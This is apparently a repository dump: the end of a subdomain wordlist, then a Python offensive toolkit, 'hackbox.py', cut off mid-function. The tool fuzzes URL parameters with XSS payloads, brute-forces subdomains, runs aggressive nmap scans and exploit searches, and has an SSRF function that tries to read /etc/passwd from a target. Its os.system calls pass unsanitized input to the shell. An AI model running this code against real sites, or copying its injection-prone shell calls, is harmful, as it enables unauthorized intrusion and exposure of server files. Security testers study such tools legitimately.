web10 1162 | international 1163 | fw2 1164 | leo 1165 | pegasus 1166 | mailbox 1167 | aaa 1168 | com 1169 | acs 1170 | vdi 1171 | inventory 1172 | simple 1173 | e-learning 1174 | fire 1175 | cb 1176 | WWW 1177 | edi 1178 | rsc 1179 | yellow 1180 | www.sklep 1181 | www.social 1182 | webmail.cpanel 1183 | act 1184 | bc 1185 | portfolio 1186 | hb 1187 | smtp01 1188 | cafe 1189 | nexus 1190 | www.edu 1191 | ping 1192 | movil 1193 | as2 1194 | builder.control 1195 | autoconfig.secure 1196 | payments 1197 | cdn1 1198 | srv3 1199 | openvpn 1200 | tm 1201 | cisco-capwap-controller 1202 | dolphin 1203 | webmail3 1204 | minerva 1205 | co 1206 | wwwold 1207 | hotspot 1208 | super 1209 | products 1210 | nova 1211 | r1 1212 | blackberry 1213 | mike 1214 | pe 1215 | acc 1216 | lion 1217 | tp 1218 | tiger 1219 | stream1 1220 | www12 1221 | admin1 1222 | mx5 1223 | server01 1224 | webdisk.forums 1225 | notes 1226 | suporte 1227 | focus 1228 | km 1229 | speed 1230 | rd 1231 | lyncweb 1232 | builder.cpanel 1233 | pa 1234 | mx10 1235 | www.files 1236 | fi 1237 | konkurs 1238 | broadcast 1239 | a1 1240 | build 1241 | earth 1242 | webhost 1243 | www.blogs 1244 | aurora 1245 | review 1246 | mg 1247 | license 1248 | homer 1249 | servicedesk 1250 | webcon 1251 | db01 1252 | dns6 1253 | cfd297 1254 | spider 1255 | expo 1256 | newsletters 1257 | h 1258 | ems 1259 | city 1260 | lotus 1261 | fun 1262 | autoconfig.webmail 1263 | statistics 1264 | ams 1265 | all.videocdn 1266 | autodiscover.shop 1267 | autoconfig.shop 1268 | tfs 1269 | www.billing 1270 | happy 1271 | cl 1272 | sigma 1273 | jwc 1274 | dream 1275 | sv2 1276 | wms 1277 | one 1278 | ls 1279 | europa 1280 | ldap2 1281 | a4 1282 | merlin 1283 | buy 1284 | web11 1285 | dk 1286 | autodiscover.webmail 1287 | ro 1288 | widgets 1289 | sql2 1290 | mysql3 1291 | gmail 1292 | selfservice 1293 | sdc 1294 | tt 1295 | mailrelay 1296 | a.ns 1297 | ns19 1298 | webstats 1299 | plesk 1300 | nsk 1301 | test6 1302 | class 1303 | agenda 1304 | adam 1305 | german 1306 | www.v2 1307 | renew 1308 | car 1309 | correio 1310 | bk 1311 | db3 1312 | voice 1313 | sentry 1314 | alt 1315 | demeter 1316 | www.projects 1317 | mail8 1318 | bounce 1319 | tc 1320 | oldwww 1321 | www.directory 1322 | uploads 1323 | carbon 1324 | all 1325 | mark 1326 | bbb 1327 | eco 1328 | 3g 1329 | testmail 1330 | ms2 1331 | node2 1332 | template 1333 | andromeda 1334 | www.photo 1335 | media2 1336 | articles 1337 | yoda 1338 | sec 1339 | active 1340 | nemesis 1341 | autoconfig.new 1342 | autodiscover.new 1343 | push 1344 | enews 1345 | advertising 1346 | mail9 1347 | api2 1348 | david 1349 | source 1350 | kino 1351 | prime 1352 | o 1353 | vb 1354 | testsite 1355 | fm 1356 | c4anvn3 1357 | samara 1358 | reklama 1359 | made.by 1360 | sis 1361 | q 1362 | mp 1363 | newton 1364 | elearn 1365 | autodiscover.beta 1366 | cursos 1367 | filter 1368 | autoconfig.beta 1369 | news2 1370 | mf 1371 | ubuntu 1372 | ed 1373 | zs 1374 | a.mx 1375 | center 1376 | www.sandbox 1377 | img5 1378 | translate 1379 | webmail.control 1380 | mail0 1381 | smtp02 1382 | s6 1383 | dallas 1384 | bob 1385 | autoconfig.store 1386 | stu 1387 | recruit 1388 | mailtest 1389 | reviews 1390 | autodiscover.store 1391 | 2011 1392 | www.iphone 1393 | fp 1394 | d3 1395 | rdp 1396 | www.design 1397 | test7 1398 | bg 1399 | console 1400 | outbound 1401 | jpkc 1402 | ext 1403 | invest 1404 | web8 1405 | testvb 1406 | vm1 1407 | family 1408 | insurance 1409 | atlanta 1410 | aqua 1411 | film 1412 | dp 1413 | ws2 1414 | webdisk.cdn 1415 | www.wordpress 1416 | webdisk.news 1417 | at 1418 | ocean 1419 | dr 1420 | yahoo 1421 | s8 1422 | host2123 1423 | libra 1424 | rose 1425 | cloud1 1426 | album 1427 | 3 1428 | antares 1429 | www.a 1430 | ipv6 1431 | bridge 1432 | demos 1433 | cabinet 1434 | crl 1435 | old2 1436 | angel 1437 | cis 1438 | www.panel 1439 | isis 1440 | s7 1441 | guide 1442 | webinar 1443 | pop2 1444 | cdn101 1445 | company 1446 | express 1447 | special 1448 | loki 1449 | accounts 1450 | video1 1451 | expert 1452 | clientes 1453 | p1 1454 | loja 1455 | blog2 1456 | img6 1457 | l 1458 | mail12 1459 | style 1460 | hcm 1461 | s11 1462 | mobile2 1463 | triton 1464 | s12 1465 | kr 1466 | www.links 1467 | s13 1468 | friends 1469 | www.office 1470 | shadow 1471 | mymail 1472 | autoconfig.forums 1473 | ns03 1474 | neu 1475 | autodiscover.forums 1476 | www.home 1477 | root 1478 | upgrade 1479 | puppet 1480 | storm 1481 | www.service 1482 | isp 1483 | get 1484 | foro 1485 | mytest 1486 | test10 1487 | desktop 1488 | po 1489 | mac 1490 | www.member 1491 | ph 1492 | blackboard 1493 | dspace 1494 | dev01 1495 | ftp4 1496 | testwww 1497 | presse 1498 | ldap1 1499 | rock 1500 | wow 1501 | sw 1502 | msn 1503 | mas 1504 | scm 1505 | its 1506 | vision 1507 | tms 1508 | www.wp 1509 | hyperion 1510 | nic 1511 | html 1512 | sale 1513 | isp-caledon.cit 1514 | www.go 1515 | do 1516 | media1 1517 | web9 1518 | ua 1519 | energy 1520 | helios 1521 | chicago 1522 | webftp 1523 | i1 1524 | commerce 1525 | www.ru 1526 | union 1527 | netmon 1528 | audit 1529 | vm2 1530 | mailx 1531 | web12 1532 | painelstats 1533 | sol 1534 | z-hn.nhac 1535 | kvm2 1536 | chris 1537 | www.board 1538 | apache 1539 | tube 1540 | marvin 1541 | bug 1542 | external 1543 | pki 1544 | viper 1545 | webadmin 1546 | production 1547 | r2 1548 | win2 1549 | vpstun 1550 | mx03 1551 | ios 1552 | www.uk 1553 | smile 1554 | www.fb 1555 | aa 1556 | www13 1557 | trinity 1558 | www.upload 1559 | www.testing 1560 | amazon 1561 | hosting2 1562 | bip 1563 | mw 1564 | www.health 1565 | india 1566 | web04 1567 | rainbow 1568 | cisco-lwapp-controller 1569 | uranus 1570 | qr 1571 | domaindnszones 1572 | editor 1573 | www.stage 1574 | manual 1575 | nice 1576 | robin 1577 | gandalf 1578 | j 1579 | buzz 1580 | password 1581 | autoconfig.mobile 1582 | gb 1583 | idea 1584 | eva 1585 | www.i 1586 | server6 1587 | www.job 1588 | results 1589 | www.test1 1590 | maya 1591 | pix 1592 | www.cn 1593 | gz 1594 | th 1595 | www.lib 1596 | autodiscover.mobile 1597 | b1 1598 | horus 1599 | zero 1600 | sv1 1601 | wptest 1602 | cart 1603 | brain 1604 | mbox 1605 | bd 1606 | tester 1607 | fotos 1608 | ess 1609 | ns31 1610 | blogx.dev 1611 | ceres 1612 | gatekeeper 1613 | csr 1614 | www.cs 1615 | sakura 1616 | chef 1617 | parking 1618 | idc 1619 | desarrollo 1620 | mirrors 1621 | sunny 1622 | kvm1 1623 | prtg 1624 | mo 1625 | dns0 1626 | chaos 1627 | avatar 1628 | alice 1629 | task 1630 | www.app 1631 | dev4 1632 | sl 1633 | sugarcrm 1634 | youtube 1635 | ic-vss6509-gw 1636 | simon 1637 | m4 1638 | dexter 1639 | crystal 1640 | terra 1641 | fa 1642 | server7 1643 | journals 1644 | iron 1645 | uc 1646 | pruebas 1647 | magic 1648 | ead 1649 | www.helpdesk 1650 | 4 1651 | server10 1652 | computer 1653 | galileo 1654 | delivery 1655 | aff 1656 | aries 1657 | www.development 1658 | el 1659 | livechat 1660 | host4 1661 | static3 1662 | www.free 1663 | sk 1664 | puma 1665 | coffee 1666 | gh 1667 | java 1668 | fish 1669 | templates 1670 | tarbaby 1671 | mtest 1672 | light 1673 | www.link 1674 | sas 1675 | poll 1676 | director 1677 | destiny 1678 | aquarius 1679 | vps3 1680 | bravo 1681 | freedom 1682 | boutique 1683 | lite 1684 | ns25 1685 | shop2 1686 | ic 1687 | foundation 1688 | cw 1689 | ras 1690 | park 1691 | next 1692 | diana 1693 | secure1 1694 | k 1695 | euro 1696 | managedomain 1697 | castor 1698 | www-old 1699 | charon 1700 | nas1 1701 | la 1702 | jw 1703 | s10 1704 | web13 1705 | mxbackup2 1706 | europe 1707 | oasis 1708 | donate 1709 | s9 1710 | ftps 1711 | falcon 1712 | DomainDnsZones 1713 | depot 1714 | NS1 1715 | genesis 1716 | mysql4 1717 | rms 1718 | ns30 1719 | www.drupal 1720 | wholesale 1721 | ForestDnsZones 1722 | www.alumni 1723 | marketplace 1724 | tesla 1725 | statistik 1726 | country 1727 | imap4 1728 | brand 1729 | gift 1730 | shell 1731 | www.dev2 1732 | apply 1733 | forestdnszones 1734 | nc 1735 | kronos 1736 | epsilon 1737 | testserver 1738 | smtp-out 1739 | pictures 1740 | autos 1741 | org 1742 | mysql5 1743 | france 1744 | shared 1745 | cf 1746 | sos 1747 | stun 1748 | channel 1749 | 2013 1750 | moto 1751 | pw 1752 | oc.pool 1753 | eu.pool 1754 | na.pool 1755 | cams 1756 | www.auto 1757 | pi 1758 | image2 1759 | test8 1760 | hi 1761 | casino 1762 | magazin 1763 | wwwhost-roe001 1764 | z-hcm.nhac 1765 | trial 1766 | cam1 1767 | victor 1768 | sig 1769 | ctrl 1770 | wwwhost-ox001 1771 | weblog 1772 | rds 1773 | first 1774 | farm 1775 | whatsup 1776 | panda 1777 | dummy 1778 | stream.origin 1779 | canada 1780 | wc 1781 | flv 1782 | www.top 1783 | emerald 1784 | sim 1785 | ace 1786 | sap 1787 | ga 1788 | bank 1789 | et 1790 | soap 1791 | guest 1792 | mdev 1793 | www.client 1794 | www.partner 1795 | easy 1796 | st1 1797 | webvpn 1798 | baby 1799 | s14 1800 | delivery.a 1801 | wwwhost-port001 1802 | hideip 1803 | graphics 1804 | webshop 1805 | catalogue 1806 | tom 1807 | rm 1808 | perm 1809 | www.ad 1810 | ad1 1811 | mail03 1812 | www.sports 1813 | water 1814 | intranet2 1815 | autodiscover.news 1816 | bj 1817 | nsb 1818 | charge 1819 | export 1820 | testweb 1821 | sample 1822 | quit 1823 | proxy3 1824 | email2 1825 | b2 1826 | servicios 1827 | novo 1828 | new2 1829 | meta 1830 | secure3 1831 | ajax 1832 | autoconfig.news 1833 | ghost 1834 | www.cp 1835 | good 1836 | bookstore 1837 | kiwi 1838 | ft 1839 | demo4 1840 | www.archive 1841 | squid 1842 | publish 1843 | west 1844 | football 1845 | printer 1846 | cv 1847 | ny 1848 | boss 1849 | smtp5 1850 | rsync 1851 | sip2 1852 | ks 1853 | leon 1854 | a3 1855 | mta1 1856 | epay 1857 | tst 1858 | mgmt 1859 | deals 1860 | dropbox 1861 | www.books 1862 | 2010 1863 | torrent 1864 | webdisk.ads 1865 | mx6 1866 | www.art 1867 | chem 1868 | iproxy 1869 | www.pay 1870 | anime 1871 | ccc 1872 | anna 1873 | ns23 1874 | hs 1875 | cg 1876 | acm 1877 | pollux 1878 | lt 1879 | meteo 1880 | owncloud 1881 | andrew 1882 | v4 1883 | www-dev 1884 | oxygen 1885 | jaguar 1886 | panther 1887 | personal 1888 | ab 1889 | dcp 1890 | med 1891 | www.joomla 1892 | john 1893 | watson 1894 | motor 1895 | mails 1896 | kiev 1897 | asia 1898 | campaign 1899 | win1 1900 | cards 1901 | fantasy 1902 | tj 1903 | martin 1904 | helium 1905 | nfs 1906 | ads2 1907 | script 1908 | anubis 1909 | imail 1910 | cp2 1911 | mk 1912 | bw 1913 | em 1914 | creative 1915 | www.elearning 1916 | ad2 1917 | stars 1918 | discovery 1919 | friend 1920 | reservations 1921 | buffalo 1922 | cdp 1923 | uxs2r 1924 | atom 1925 | cosmos 1926 | www.business 1927 | a2 1928 | xcb 1929 | allegro 1930 | om 1931 | ufa 1932 | dw 1933 | cool 1934 | files2 1935 | webdisk.chat 1936 | ford 1937 | oma 1938 | zzb 1939 | staging2 1940 | texas 1941 | ib 1942 | cwc 1943 | aphrodite 1944 | re 1945 | spark 1946 | www.ftp 1947 | oscar 1948 | atlantis 1949 | osiris 1950 | os 1951 | m5 1952 | dl1 1953 | www.shopping 1954 | ice 1955 | beta1 1956 | mcu 1957 | inter 1958 | interface 1959 | gm 1960 | kiosk 1961 | so 1962 | dss 1963 | www.survey 1964 | customers 1965 | fx 1966 | nsa 1967 | csg 1968 | mi 1969 | url 1970 | dl2 1971 | NS2 1972 | show 1973 | www.classifieds 1974 | mexico 1975 | knowledge 1976 | frank 1977 | tests 1978 | accounting 1979 | krasnodar 1980 | um 1981 | hc 1982 | www.nl 1983 | echo 1984 | property 1985 | gms 1986 | london 1987 | www.clients 1988 | academy 1989 | cyber 1990 | www.english 1991 | museum 1992 | poker 1993 | www.downloads 1994 | gp 1995 | cr 1996 | arch 1997 | gd 1998 | virgo 1999 | si 2000 | smtp-relay 2001 | -------------------------------------------------------------------------------- /hackbox.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | # !Author: Suleman Malik 4 | # !Contact: samhax@protonmail.com 5 | 6 | from __future__ import print_function 7 | 8 | import os 9 | import random 10 | import re 11 | import sys 12 | import time 13 | import traceback 14 | from datetime import datetime 15 | from string import whitespace 16 | from threading import Thread 17 | 18 | import dns.resolver 19 | import requests 20 | from colorama import Fore, Style 21 | 22 | try: 23 | import urlparse 24 | except ImportError: 25 | import urllib.parse as urlparse 26 | try: 27 | import queue 28 | except ImportError: 29 | import Queue as queue 30 | 31 | try: 32 | input = raw_input 33 | except NameError: 34 | pass 35 | 36 | try: 37 | import readline 38 | readline.parse_and_bind("tab: complete") 39 | except ImportError: 40 | pass 41 | 42 | # CONSTANTS 43 | GOOD = "[+] " 44 | INFO = "[!] " 45 | NEWLINE = "\n" 46 | NOT_VULNERABLE = "Not Vulnerable" 47 | 48 | 49 | def line(): 50 | print("====================================") 51 | 52 | 53 | def xss(): 54 | def list_import(file): 55 | try: 56 | # Importing Payloads from specified wordlist. 57 | with open(file, 'r') as list_file: 58 | content = list_file.readlines() 59 | return [x.strip() for x in content] 60 | except IOError: 61 | print(Style.BRIGHT + Fore.RED + INFO + 62 | "List not found!" + Style.RESET_ALL) 63 | return list() 64 | 65 | def params_check(params, statuses): 66 | try: 67 | dashes1 = str() 68 | dashes2 = str() 69 | lostatus = str() 70 | nums = [] 71 | num_of_params = len(max(params, key=len)) 72 | if num_of_params < 10: 73 | num_of_params = 10 74 | for index in range(len(params)): 75 | nums.append(index) 76 | maxval = str(len(nums)) # number 77 | for _ in range(num_of_params): 78 | dashes2 += "-" 79 | for _ in range(len(maxval)): 80 | dashes1 += "-" 81 | statuslen = len(max(statuses, key=len)) 82 | for _ in range(statuslen): 83 | lostatus += "-" 84 | if len(dashes2) < 10: 85 | dashes2 = "----------" 86 | if len(lostatus) < 14: 87 | lostatus = "--------------" 88 | if len(dashes1) < 2: 89 | dashes1 = "-" 90 | los = statuslen 91 | if los < 14: 92 | los = 14 93 | upb = ("+-%s-+-%s-+-%s-+") % (dashes1, dashes2, lostatus) 94 | print(upb) 95 | print("| # | " + "Param".center(num_of_params, " ") + 96 | " | " + "Status".center(los, " ") + " |") 97 | print(upb) 98 | for num, param, status in zip(nums, params, statuses): 99 | # string = (" %s | %s ") % (str(num), str(param)) 100 | lofnum = str(num).center(int(len(dashes1)), " ") 101 | lofstr = param.center(num_of_params, " ") 102 | lofst = status.center(los, " ") 103 | if NOT_VULNERABLE in lofst: 104 | lofst = Fore.GREEN + \ 105 | status.center(los, " ") + Style.RESET_ALL 106 | else: 107 | lofst = Fore.RED + \ 108 | status.center(los, " ") + Style.RESET_ALL 109 | print("| " + lofnum + " | " + lofstr + " | " + lofst + " |") 110 | print(upb) 111 | return str() 112 | except ValueError: 113 | print(Style.BRIGHT + Fore.RED + 114 | "No parameters in URL!" + Style.RESET_ALL) 115 | 116 | def complete(params, results, vulnerable, domain): 117 | if vulnerable == 0: 118 | print( 119 | GOOD + "All parameters are " + Style.BRIGHT + Fore.GREEN + NOT_VULNERABLE + Style.RESET_ALL + " to XSS.") 120 | elif vulnerable == 1: 121 | print((GOOD + "%s Parameter is " + Style.BRIGHT + Fore.RED + 122 | "vulnerable" + Style.RESET_ALL + " to XSS.") % vulnerable) 123 | else: 124 | print((GOOD + "%s parameters are " + Style.BRIGHT + Fore.RED + 125 | "vulnerable" + Style.RESET_ALL + " to XSS.") % vulnerable) 126 | print((GOOD + "Scan Result for %s:") % domain) 127 | print(params_check(params, results)) 128 | 129 | def get(): 130 | try: 131 | site = input( 132 | "Enter URL (e.g https://example.com/?id=): ") # Taking URL 133 | if not site.startswith('https://') or site.startswith('http://'): 134 | site = "http://" + site 135 | finalurl = urlparse.urlparse(site) 136 | domain0 = '{uri.scheme}://{uri.netloc}/'.format(uri=finalurl) 137 | domain = domain0.replace( 138 | "https://", "").replace("http://", "").replace("www.", "").replace("/", "") 139 | print(Style.DIM + Fore.WHITE + 140 | GOOD + "Checking if " + domain + " is available..." + Style.RESET_ALL) 141 | response = requests.get(domain0).text 142 | if not response: 143 | print(Style.BRIGHT + Fore.RED + 144 | INFO + "Site " + domain + " is offline!" + Style.RESET_ALL) 145 | return 146 | print(GOOD + Fore.GREEN + domain + 147 | " is available!!" + Style.RESET_ALL) 148 | 149 | wordlist = input( 150 | "Enter XSS wordlist [Defaults to ./src/wordlist.txt]: ") 151 | if not wordlist: 152 | wordlist = './src/wordlist.txt' 153 | # deafult-word-list-for-xss 154 | payloads = list_import(wordlist) 155 | lop = str(len(payloads)) 156 | print(GOOD + lop + " Payloads loaded..") 157 | parameters = urlparse.parse_qs( 158 | urlparse.urlparse(site).query, keep_blank_values=True) 159 | path = urlparse.urlparse(site).scheme + "://" + urlparse.urlparse(site).netloc + urlparse.urlparse( 160 | site).path 161 | 162 | final_params = list() 163 | final_results = list() 164 | progress = 0 165 | total = 0 166 | # Scanning the parameter. 167 | for param_name in parameters.keys(): 168 | vulnerable = False 169 | print(GOOD + "Now checking '" + param_name + "' param") 170 | final_params.append(str(param_name)) 171 | for payload in payloads: # 172 | validate = payload.translate(whitespace) 173 | if validate == "": 174 | progress += 1 175 | else: 176 | sys.stdout.write( 177 | "\r%s %i / %s payloads tested." % (GOOD, progress + 1, len(payloads))) 178 | sys.stdout.flush() 179 | progress += 1 180 | enc = requests.utils.requote_uri(payload) 181 | data = path + "?" + param_name + \ 182 | "=" + parameters[param_name][0] + enc 183 | page = requests.get(data).text 184 | if payload in page: 185 | print((Style.BRIGHT + Fore.RED + NEWLINE + INFO + "XSS Vulnerability Found! " + NEWLINE + Fore.RED + Style.BRIGHT + INFO + 186 | "Parameter:\t%s" + NEWLINE + Fore.RED + Style.BRIGHT + INFO + "Payload:\t%s" + Style.RESET_ALL) % (param_name, payload)) 187 | final_results.append(" Vulnerable ") 188 | vulnerable = True 189 | total += 1 190 | progress += 1 191 | break 192 | else: 193 | vulnerable = False 194 | if not vulnerable: 195 | print((NEWLINE + GOOD + "'%s' parameter not vulnerable.") % 196 | param_name) 197 | final_results.append(NOT_VULNERABLE) 198 | progress += 1 199 | progress = 0 200 | complete(final_params, final_results, total, domain) 201 | except KeyboardInterrupt: 202 | print(NEWLINE + "Exit...") 203 | 204 | get() 205 | 206 | 207 | def exploits(): 208 | line() 209 | print("EXPLITS") 210 | choice = int(input("[1] Seach Exploits\n[2] Update Pack\n\nChoice: ")) 211 | if choice == 1: 212 | query = input("Search exploit (e.g wordpress): ") 213 | print(NEWLINE + 'Searching exploits...' + NEWLINE) 214 | os.system('getsploit ' + query) 215 | elif choice == 2: 216 | os.system('getsploit --update') 217 | 218 | 219 | def subd(): 220 | version = "1" 221 | build = "0.1" 222 | 223 | class Lookup(Thread): 224 | def __init__(self, in_q, out_q, domain, wildcard=False, resolver_list=list()): 225 | Thread.__init__(self) 226 | self.in_q = in_q 227 | self.out_q = out_q 228 | self.domain = domain 229 | self.wildcard = wildcard 230 | self.resolver_list = resolver_list 231 | self.resolver = dns.resolver.Resolver() 232 | if self.resolver.nameservers: 233 | self.backup_resolver = self.resolver.nameservers 234 | else: 235 | # we must have a resolver, and this is the default resolver on my system... 236 | self.backup_resolver = ['127.0.0.1'] 237 | if self.resolver_list: 238 | self.resolver.nameservers = self.resolver_list 239 | 240 | def check(self, host): 241 | slept = 0 242 | while True: 243 | try: 244 | answer = self.resolver.query(host) 245 | if answer: 246 | return str(answer[0]) 247 | return 248 | except dns.resolver.NXDOMAIN: 249 | return 250 | except (dns.resolver.NoAnswer, dns.resolver.Timeout): 251 | if slept == 4: 252 | # This dns server stopped responding. 253 | # We could be hitting a rate limit. 254 | if self.resolver.nameservers == self.backup_resolver: 255 | # if we are already using the backup_resolver use the resolver_list 256 | self.resolver.nameservers = self.resolver_list 257 | else: 258 | # fall back on the system's dns name server 259 | self.resolver.nameservers = self.backup_resolver 260 | elif slept > 5: 261 | # hmm the backup resolver didn't work, 262 | # so lets go back to the resolver_list provided. 263 | # If the self.backup_resolver list did work, lets stick with it. 264 | self.resolver.nameservers = self.resolver_list 265 | # I don't think we are ever guaranteed a response for a given name. 266 | return 267 | # Hmm, we might have hit a rate limit on a resolver. 268 | time.sleep(1) 269 | slept += 1 270 | except IndexError: 271 | pass 272 | except Exception as error: 273 | raise error 274 | 275 | def run(self): 276 | while True: 277 | sub = self.in_q.get() 278 | # if sub != False: 279 | # print 'Try: %s' % (sub) 280 | if not sub: 281 | # Perpetuate the terminator for all threads to see 282 | self.in_q.put(False) 283 | # Notify the parent of our death of natural causes. 284 | self.out_q.put(False) 285 | break 286 | else: 287 | try: 288 | test = "%s.%s" % (sub, self.domain) 289 | addr = self.check(test) 290 | if addr and addr != self.wildcard: 291 | test = (test, str(addr)) 292 | self.out_q.put(test) 293 | except Exception: 294 | pass 295 | # ++ FUNCTIONS //# 296 | # func Writelog 297 | 298 | def func_writelog(how, logloc, txt): # how: a=append, w=new write 299 | with open(logloc, how) as mylog: 300 | mylog.write(txt) 301 | 302 | def check_resolvers(file_name): 303 | txt = 'Checking sudomains...' 304 | print(txt) 305 | ret = [] 306 | resolver = dns.resolver.Resolver() 307 | res_file = open(file_name).read() 308 | for server in res_file.split(NEWLINE): 309 | server = server.strip() 310 | if server: 311 | resolver.nameservers = [server] 312 | try: 313 | resolver.query("www.google.com") 314 | # should throw an exception before this line. 315 | ret.append(server) 316 | except Exception: 317 | pass 318 | return ret 319 | 320 | def run_target(target, hosts, resolve_list, thread_count, print_numeric): 321 | # The target might have a wildcard dns record... 322 | wildcard = False 323 | try: 324 | resp = dns.resolver.Resolver().query( 325 | "would never be a domain name" + str(random.randint(1, 9999)) + "." + target) 326 | wildcard = str(resp[0]) 327 | except Exception: 328 | pass 329 | in_q = queue.Queue() 330 | out_q = queue.Queue() 331 | for host in hosts: 332 | in_q.put(host) 333 | # Terminate the queue 334 | in_q.put(False) 335 | step_size = int(len(resolve_list) / thread_count) 336 | # Split up the resolver list between the threads. 337 | if step_size <= 0: 338 | step_size = 1 339 | step = 0 340 | for i in range(thread_count): 341 | threads.append(Lookup(in_q, out_q, target, wildcard, 342 | resolve_list[step:step + step_size])) 343 | threads[-1].start() 344 | step += step_size 345 | if step >= len(resolve_list): 346 | step = 0 347 | threads_remaining = thread_count 348 | subdlist = {} 349 | subiplist = {} 350 | i = 0 351 | while True: 352 | try: 353 | domain = out_q.get(True, 10) 354 | # we will get an empty exception before this runs. 355 | if not domain: 356 | threads_remaining -= 1 357 | else: 358 | if not print_numeric: 359 | txt = "%s" % (domain[0]) 360 | func_writelog('a', logloc, txt + NEWLINE) 361 | # print txt 362 | else: 363 | txt = "%s -> %s" % (domain[0], domain[1]) 364 | func_writelog('a', logloc, txt + NEWLINE) 365 | # print(txt) 366 | subdlist[i] = txt 367 | if domain[1] in subiplist.keys(): 368 | subiplist[domain[1]].append(domain[0]) 369 | else: 370 | subiplist[domain[1]] = [domain[0]] 371 | i += 1 372 | except queue.Empty: 373 | pass 374 | # make sure everyone is complete 375 | if threads_remaining <= 0: 376 | print(" ") 377 | print("Done. ") 378 | txt = 'Subdomains found : %s' % (len(subdlist)) 379 | # Alfab. ordered result list 380 | func_writelog('a', logloc, NEWLINE + txt + NEWLINE + 381 | 'Ordered list:' + NEWLINE + '-------------' + NEWLINE) 382 | print(txt) 383 | print(' ') 384 | print('Ordered List:') 385 | for result in sorted(subdlist.values()): 386 | txt = result 387 | func_writelog('a', logloc, str(txt) + NEWLINE) 388 | print(txt) 389 | print(' ') 390 | # IP-ordered result list 391 | txt = "IP-ordered List:" 392 | func_writelog('a', logloc, NEWLINE + txt + 393 | NEWLINE + '----------------' + NEWLINE) 394 | print(txt) 395 | for ips in subiplist: 396 | txt = ips 397 | func_writelog('a', logloc, str(txt) + NEWLINE) 398 | print(txt) 399 | for ipssub in subiplist[ips]: 400 | txt = " |=> %s" % (ipssub) 401 | func_writelog('a', logloc, str(txt) + NEWLINE) 402 | print(txt) 403 | 404 | end = datetime.now() 405 | time_stamp_end = int(time.time()) 406 | duration = int(time_stamp_end) - int(time_stamp_start) 407 | time_end = str(end.year) + "-" + str(end.month) + "-" + str(end.day) + " " + str( 408 | end.hour) + ":" + str(end.minute) + ":" + str(end.second) 409 | txt = "Scan Ended : %s" % (time_end) 410 | txt_b = "Duration : %ss" % (duration) 411 | func_writelog('a', logloc, NEWLINE + txt + NEWLINE) 412 | func_writelog('a', logloc, txt_b + NEWLINE) 413 | print(" ") 414 | print(txt) 415 | print(txt_b) 416 | break 417 | """ 418 | ON FIRST RUN : SETTING UP BASIC FILES AND FOLDERS 419 | BEGIN: 420 | """ 421 | # -- Creating default log directory 422 | logdir = "log" 423 | if not os.path.exists(logdir): 424 | os.makedirs(logdir) 425 | txt = "Directory 'log/' created" 426 | print(txt) 427 | """ 428 | :END 429 | ON FIRST RUN : SETTING UP BASIC FILES AND FOLDERS 430 | """ 431 | # Target 432 | print(NEWLINE) 433 | target = input("Target domain (eg. example.com): ") 434 | # Subs 435 | subfiles = "", "./src/subs/subs_xs.txt" 436 | choosensub = 1 437 | hosts = open(subfiles[int(choosensub)]).read().split(NEWLINE) 438 | # Action 439 | resolve_list = check_resolvers("cnf/resolvers.txt") 440 | threads = [] 441 | # signal.signal(signal.SIGINT, killme) 442 | target = target.strip() 443 | if target: 444 | """ Every run : create log file """ 445 | # -- Creating log file in directory 'log' --# 446 | now = datetime.now() 447 | time_stamp_start = int(time.time()) 448 | time_start = str(now.year) + "-" + str(now.month) + "-" + str(now.day) + " " + str(now.hour) + ":" + str( 449 | now.minute) + ":" + str(now.second) 450 | logfile = target.replace('.', '_') + '_' + str(now.year) + str(now.month) + str(now.day) + str( 451 | now.hour) + str(now.minute) + str(now.second) + ".log" 452 | print("Creating log : log/%s" % (logfile), end=' ') 453 | logloc = logdir + "/" + logfile 454 | with open(logloc, "w") as mylog: 455 | os.chmod(logloc, 0o660) 456 | mylog.write("Log created - " + version + 457 | " build " + build + NEWLINE + NEWLINE) 458 | print(".... Done") 459 | print(" ") 460 | """ """ 461 | txt = "Scan Started : %s" % (time_start) 462 | func_writelog('a', logloc, txt + NEWLINE + NEWLINE) 463 | print(txt) 464 | print(" ") 465 | # -- Visible IP --# 466 | try: 467 | visible_ip = requests.get( 468 | 'https://cleveridge.org/_exchange/open_files/return_ip.php?s=subd_scanner', verify=False).text 469 | except Exception: 470 | visible_ip = requests.get( 471 | 'https://enabledns.com/ip', verify=False).text 472 | txt = "Visible IP: " + visible_ip 473 | func_writelog("a", logloc, txt + NEWLINE + NEWLINE) 474 | print(txt) 475 | print(' ') 476 | 477 | txt = "Subdomains in %s: " % (target) 478 | func_writelog('a', logloc, txt + NEWLINE) 479 | print(txt) 480 | run_target(target, hosts, resolve_list, 10, True) 481 | menu() 482 | 483 | 484 | def whois_geo(): 485 | who = input('Domain(e.g google.com): ') 486 | whois = requests.get( 487 | 'http://api.hackertarget.com/whois/?q=' + who).text 488 | print(whois) 489 | line() 490 | print("GEOIP LOCATION") 491 | line() 492 | geoip = requests.get( 493 | 'http://api.hackertarget.com/geoip/?q=' + who).text 494 | print(geoip) 495 | line() 496 | 497 | 498 | def ssrf_injection(): 499 | print(NEWLINE) 500 | ssrf = input( 501 | 'Target URL (e.g http://robert-brook.com/parliament/index.php?page=): ') 502 | print("\tGETTING /etc/passwd from system") 503 | ssrf_result = requests.get(ssrf + 'file:///etc/passwd') 504 | if ssrf_result.status_code == 200: 505 | print(ssrf_result.text) 506 | else: 507 | print("SSRF failed on %s" % ssrf_result.url) 508 | print( 509 | NEWLINE + " For detail visit https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF") 510 | 511 | 512 | def nmap_auto_banner(): 513 | target = input('Target Domain/IP (e.g www.google.com): ') 514 | line() 515 | print("\tRUNNING SYSTEM NMAP") 516 | line() 517 | os.system('nmap -sT -sV -sC -PN -A -T5 ' + target) 518 | line() 519 | print("\tTCP PORT SCANING") 520 | line() 521 | tcp = requests.get( 522 | 'http://api.hackertarget.com/nmap/?q=' + target).text 523 | print(tcp) 524 | line() 525 | print("\tSUBNET CALCULATION") 526 | line() 527 | subnet = requests.get( 528 | 'https://api.hackertarget.com/subnetcalc/?q=' + target).text 529 | print(subnet) 530 | print(NEWLINE) 531 | 532 | 533 | def js_url_parser(): 534 | def extract_urls(content): 535 | urls = re.findall( 536 | 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', content.lower()) 537 | clean_urls = [] 538 | for url in urls: 539 | last_char = url[-1] 